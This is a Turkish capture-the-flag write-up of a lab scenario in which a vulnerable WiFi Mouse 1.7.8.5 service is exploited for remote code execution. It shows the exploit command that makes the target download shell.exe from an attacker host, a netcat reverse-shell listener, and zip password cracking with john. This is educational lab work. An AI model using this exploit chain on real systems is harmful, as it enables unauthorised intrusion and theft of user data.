Bazen bir sisteme sızmanın yolu karmaşık zafiyetlerden değil, oldukça basit görünen yardımcı uygulamalardan geçebiliyor. Shadow Track senaryosunda da buna benzer bir durumla karşılaştık. Senaryoda, bir kafede Wi-Fi üzerinden hedef sistemlere sızmaya çalışan bir hacker grubunun izini sürmemiz ve kullandıkları yöntemleri ortaya çıkarmamız gerekiyordu.
Keşif Aşaması
İlk olarak hedef makine üzerinde temel bir port taraması yaptım. Tarama sonucunda 135, 139 ve 445 portlarının açık olduğu görüldü. Bunlar genellikle Windows sistemlerde karşımıza çıkan MSRPC, NetBIOS ve SMB servisleri.
Bu servisler üzerinden bazı denemeler yaptım ancak doğrudan bir giriş elde edemedim. SMB üzerinden yapılan brute-force denemeleri de STATUS_LOGON_FAILURE hatası veriyordu.
Bu noktada sistem hakkında daha fazla bilgi toplamak için crackmapexec kullandım. Bu araç sayesinde hedef bilgisayarın adı ve işletim sistemi hakkında bazı bilgileri elde etmek mümkün oldu.
Kapsamlı Tarama
Daha sonra tüm portları kapsayan bir Nmap taraması gerçekleştirdim.
nmap -sS -sV -sC -p- --min-rate 1000 <hedef-ip>Bu tarama sırasında dikkat çeken bir detay ortaya çıktı. 1978 numaralı portta çalışan bir servis vardı ve servis cevabında luminateOK ifadesi bulunuyordu.
Bu bilgiyle biraz araştırma yaptığımda Exploit-DB'de WiFi Mouse 1.7.8.5 — Remote Code Execution zafiyetiyle karşılaştım.
WiFi Mouse Zafiyeti
WiFi Mouse uygulaması, telefonu bilgisayar için kablosuz fare ve klavye olarak kullanmayı sağlayan bir yazılım. Ancak 1.7.8.5 sürümünde ciddi bir güvenlik problemi bulunuyor.
Uygulama, ağ üzerinden gelen bazı komutları kimlik doğrulama yapmadan kabul edebiliyor. Bu durum saldırganın hedef sisteme klavye girdileri göndermesine imkan tanıyor.
Başka bir deyişle saldırgan:
- komut istemi açabilir
- komut çalıştırabilir
- sistem üzerinde uzaktan işlem yapabilir
Bu da pratikte Remote Code Execution (RCE) anlamına geliyor.
Exploit Kullanımı
Zafiyeti test etmek için Python tabanlı bir exploit kullandım. Amaç, hedef sistemin saldırgan makinede barındırılan bir dosyayı indirmesini sağlamaktı.
python2 wifimouse_rc.py <hedef-ip> <attacker-ip> shell.exeAynı anda saldırgan makinede netcat ile 4444 portunda dinleme başlatıldı.
nc -lvnp 4444Hedef makine zararlı dosyayı çalıştırdıktan sonra reverse shell bağlantısı geldi ve sisteme erişim sağlandı.
Post-Exploitation
Sisteme Harry kullanıcısı olarak erişim sağlandıktan sonra dosya sistemi üzerinde inceleme yaptım.
Masaüstünde bulunan response.txt dosyası dikkat çekiyordu. Bu dosya içinde bazı web siteleri ve kullanıcı bilgileri bulunuyordu. Dosya içinde arama yapmak için findstr komutunu kullandım.
Bu bilgiler senaryodaki bazı flag'leri elde etmemizi sağladı.
Ayrıca sistemde bazı Telegram bağlantıları ve hedef alınan domainleri içeren target_domains.txt dosyası da bulundu.
Şifreli Dosya Analizi
Masaüstünde ayrıca malware.zip isimli şifreli bir dosya vardı. Bu dosyayı analiz etmek için kendi makinemize transfer ettim.
Zip dosyasının şifresini kırmak için şu adımları izledim:
Önce hash çıkardım:
zip2john malware.zip > hash.txtArdından wordlist ile kırma işlemi yaptım:
john --wordlist=xato-net-10-million-passwords.txt hash.txtŞifre çözüldükten sonra zip içindeki malware.exe dosyasının MD5 değeri alındı ve senaryodaki son flag elde edildi.
Sonuç
Bu senaryo basit görünen yardımcı yazılımların bile ciddi güvenlik riskleri oluşturabileceğini gösteriyor. Özellikle ağ üzerinden kontrol edilen uygulamaların güncel tutulmaması, sistemlerin dışarıdan kontrol edilmesine kadar gidebilen sonuçlar doğurabiliyor.
Sızma testlerinde bazen en kritik giriş noktası, gözden kaçan küçük servisler olabiliyor. Bu nedenle kapsamlı tarama yapmak ve tespit edilen servisleri mutlaka araştırmak oldukça önemli.